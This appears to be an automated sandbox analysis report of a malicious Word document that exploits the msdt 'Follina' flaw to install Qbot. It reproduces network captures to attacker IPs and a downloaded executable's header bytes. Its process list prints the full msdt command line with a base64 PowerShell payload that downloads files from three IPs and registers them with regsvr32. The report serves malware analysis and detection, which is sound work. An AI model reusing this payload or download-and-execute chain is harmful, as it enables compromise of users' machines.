                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65
                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
                                                                                                                                                                    Jun 7, 2022 19:21:18.104799032 CEST1230OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:18.132652044 CEST1230INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:18 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Jun 7, 2022 19:21:18.607587099 CEST1230OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:18.635207891 CEST1230INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:18 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Jun 7, 2022 19:21:18.925173044 CEST1232OUTGET /123.RES HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    If-None-Match: "6299dd5d-1861"
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:18.952740908 CEST1232INHTTP/1.1 304 Not Modified
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:18 GMT
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Jun 7, 2022 19:21:18.963536978 CEST1233OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:18.991211891 CEST1233INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:18 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Jun 7, 2022 19:21:19.215001106 CEST1234OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:19.242710114 CEST1234INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:19 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Jun 7, 2022 19:21:28.708358049 CEST1315OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:21:28.736881971 CEST1315INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:28 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    2192.168.2.449780185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Jun 7, 2022 19:22:39.049490929 CEST4415OUTGET /1240405476.dat HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Jun 7, 2022 19:22:39.216723919 CEST4416INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:22:39 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 1437696
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Expires: 0
                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                    Content-Disposition: attachment;
                                                                                                                                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54
                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B* @Pp%HlSCODE `DATA' (@BSSqP..idata%p&.@.reloclSTT@P.rsrcHH@PP@P@Boolean@FalseT


                                                                                                                                                                    Statistics

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:19:20:46
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                                                                                                                                                                    Imagebase:0x1190000
                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:19:20:47
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff647620000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:19:20:48
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                                                                                                                                                                    Imagebase:0xea0000
                                                                                                                                                                    File size:430592 bytes
                                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:19:20:59
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\System32\drivers\udfs.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:324608 bytes
                                                                                                                                                                    MD5 hash:6A442723D4D05D9F15D24C9942CDA00D
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:19:21:01
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "
                                                                                                                                                                    Imagebase:0x1280000
                                                                                                                                                                    File size:1937688 bytes
                                                                                                                                                                    MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:19:21:12
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                    Imagebase:0x1190000
                                                                                                                                                                    File size:466688 bytes
                                                                                                                                                                    MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:19:21:12
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                    Imagebase:0x1190000
                                                                                                                                                                    File size:466688 bytes
                                                                                                                                                                    MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:19:21:20
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                                    File size:1508352 bytes
                                                                                                                                                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.807640335.0000000003050000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.805909900.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000013.00000002.806003549.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:19:21:30
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    Imagebase:0xc20000
                                                                                                                                                                    File size:3611360 bytes
                                                                                                                                                                    MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000018.00000000.351550985.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000018.00000002.797056780.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:19:22:05
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
                                                                                                                                                                    Imagebase:0xb40000
                                                                                                                                                                    File size:2170976 bytes
                                                                                                                                                                    MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:19:22:08
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
                                                                                                                                                                    Imagebase:0x1090000
                                                                                                                                                                    File size:43176 bytes
                                                                                                                                                                    MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:19:22:11
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
                                                                                                                                                                    Imagebase:0xb40000
                                                                                                                                                                    File size:2170976 bytes
                                                                                                                                                                    MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                                                                                    General

